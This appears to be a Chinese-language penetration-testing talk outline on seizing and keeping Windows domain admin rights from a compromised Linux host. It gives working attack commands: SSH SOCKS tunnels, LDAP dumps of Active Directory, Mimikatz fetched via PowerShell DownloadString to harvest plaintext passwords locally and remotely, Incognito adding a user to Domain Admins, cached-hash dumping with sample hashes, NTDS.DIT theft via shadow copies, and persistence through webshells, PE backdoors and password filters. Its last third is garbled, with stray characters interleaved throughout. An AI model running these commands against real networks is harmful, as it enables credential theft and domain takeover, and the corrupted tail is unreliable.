滲透測試中的技巧

滲透測試中的技巧Mickey議題的內(nèi)容：快速獲取域權(quán)限的方法黑客工具使用的逆向思維釣魚站的access注入waf繞過目前已經(jīng)掌握的情況搞定一臺邊界的Linux服務(wù)器

數(shù)據(jù)庫配置文件中有注釋掉的一個域帳號

當前機器不在域中

我有root權(quán)限

怎么收集信息？準備工作：方便本地kali下的工具使用，開個反彈socks5 ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort=31337 ssh-o"StrictHostKeyCheckingno"-oUserKnownHostsFile=/dev/null-T-fND:8888mail@-p31337

ssh-o"StrictHostKeyCheckingno"-T-fNR8888::8888proxy@公網(wǎng)IP或者用CobaltStrike的beacon你為什么不直接用reGeorg?

因為當時提示trimDirectiveWhitespaces錯誤！！域內(nèi)信息收集Windows下很多工具獲取域信息

dsquery，AdFind

ldifde，Sysinternals'ADExplorer等linux下呢？我用ldapsearch+adoffline.pyroot@Gamer:~/#proxychains

ldapsearch-hAD1.-x-D"mickey@"-b"dc=corp,dc=target,dc=net"-Epr=1000/noprompt-oldif-wrap=no-w'password!@#'>clint.ldif域內(nèi)信息收集ldapsearch+adoffline.py組合哪里好？

離線的！！可搜索的！！查看description,comment,titleorinfo域有內(nèi)容的sqlite>selectcn,description,title,comment,infofromview_userswhere(descriptionISNOTNULLortitleISNOTNULLorcommentISNOTNULLorinfoISNOTNULL);顯示有計算機description的sqlite>selectcn,description,infoFROMview_computersWHERE(descriptionISNOTNULLorinfoISNOTNULL);顯示域內(nèi)的winxp和2000主機sqlite>selectdnsHostName,description,info,operatingSystemfromview_computerswhereoperatingSystemLIKE'%Windows%2000%'ORoperatingSystemLIKE'%Windows%XP%';查看域管理員sqlite>selectmember_cnfromview_activegroupuserswheregroup_cn="DomainAdmins";域內(nèi)信息收集快速獲取域權(quán)限的方法

LowHangingFruit[找軟柿子捏]神器kekeo[ms14068,比PyKEK方便] GPP[KB2962486]

十分鐘愛SQLSERVER弱口令和潛在的SilverTicket攻擊

[SPN]

本地administrator帳戶通殺+Incognito

DomainCache的破解

管理員配置錯誤十分鐘愛SQLSERVER弱口令和潛在的SilverTicket攻擊[SPN]

明文密碼抓取本地明文密碼抓取:nohuppython-mSimpleHTTPServer8888& powershell"IEX(New-ObjectNet.WebClient).DownloadString('/Invoke-Mimikatz.ps1');Invoke-Mimikatz–DumpCerts遠程主機明文密碼抓取如果開啟了PowershellRemoting（類似WinRM，開放47001端口)Dump遠程機器的密碼powershell“IEX(New-ObjectNet.WebClient).DownloadString('/Invoke-Mimikatz.ps1');Invoke-Mimikatz-DumpCreds-ComputerName@(‘computer1′,‘computer2′)”本地administrator帳戶通殺+Incognito

列舉所hosts.txt里主機所有的token,將pentest用戶加入到域管理員組D:\>incognito.exe-fhosts.txt-uadministrator-pcorp1234-n20add_group_user-hdc1."DomainAdmins"pentestDomainCache的破解沒法用于pass

thehash抓取工具 /coresecurity/impacket $secretsdump.py-samsam.save-securitysecurity.save-systemsystem.saveLOCAL [*]Dumpingcacheddomainlogoninformation(uid:encryptedHash:longDomain:domain) hdes:6ec74661650377df488415415bf10321::TARGET::: Administrator:c4a850e0fee5af324a57fd2eeb8dbd24:target.CORP.COM:TARGET:::

破解時注意格式問題

mscash(xp,w2k3)

mscash2(vista,w7,w2k8…)支持破解的工具彩虹表：CainGPU

：HashCat管理員配置錯誤

如果計算機帳號在”DomainAdmins”或者“ADBackups”組里那么登陸到該計算機的管理用戶是不是能獲取到”Domainadmins”組的權(quán)限？

維持域權(quán)限金鑰匙[http:///tips/9591]dump所有域HASH[gsecdumpv2b5/卷影副本]邊界服務(wù)器留webshell文件服務(wù)器用BDF插PEevilpassfilter盯住管理員郵箱和聊天軟件VPN入口dump所有域HASH[gsecdumpv2b5/卷影副本]

C:\>cscriptvssown.vbs/listC:\>cscriptvssown.vbs/statusC:\>cscriptvssown.vbs/modeC:\>cscriptvssown.vbs/createC:\>copy\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM.C:\>copy\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\ntds\NTDS.DIT.C:\>cscriptvssown.vbs/delete{D79A4E73-CCAB-4151-B726-55F6C5C3A853}C:\>cscriptvssown.vbs/stop PasscapeWindowsPasswordRecovery/windows_password_recovery文件洋服務(wù)心器用BD享F插PEht劇tp益s:栽//舊gi斷th逼ub邁.c概om蟲/s速ec較re關(guān)ts鐘qu歉ir已re糊l/吼th第e-元ba像ck妨do滴or洋-f轎ac現(xiàn)to鼓ry支持物多種幕文件披格式(P素E/項EL陽F/負Ma寫ch壤-O違)支持冬代碼敞簽名ev控il凳pa途ss對fi斑lt柏erht齡tp源s:黨//機gi民st狡.g允it瞎hu餓b.致co隨m/雖mu冰bi廟x/羨65凱14妥31歷1#脫fi升le楚-e育vi積lp傲as奶sf范il害te葵r-教cp剝p黑客嚷工具奮使用螞的逆莫向思棉維NB斷NS愿欺騙輝除了番用于蛙擴展箏其他供服務(wù)鑒器，撇欺騙奔本地屠服務(wù)郵器？WP伙AD欺騙代除了駁用于順擴展掠其他戴服務(wù)設(shè)器，董欺騙稠本地蔬服務(wù)滔器？跨協(xié)驅(qū)議攻威擊原理縮慧：本地NB姿NS欺騙HO遲ST窗S北->攏D飼NS行-淺>勝NB紹NS欺騙WP愉AD代理鄉(xiāng)豐服務(wù)ht報tp閥:/右/w竄pa凈d/促wp防ad慰.d叢at跨協(xié)屯議攻擊[繞過MS頁08隔-0五68限制]Wi量nd姓ow街s:統(tǒng)L修oc脊al褲W盞eb魔DA喊V傻NT急LM賠R劇ef頃le銹ct強io遙n只El昌ev顧at有io刻n跡of藝P崇ri錘vi例le愁geHT脈TP杯-舞>啊SM糞B盤NT爪LM窯R奏el煌ay黑客貴工具采使用汪的逆協(xié)向思蟻維釣魚麥站的ac縱ce辰ss注入wa隨f繞過通過ds勿um名()和df疾i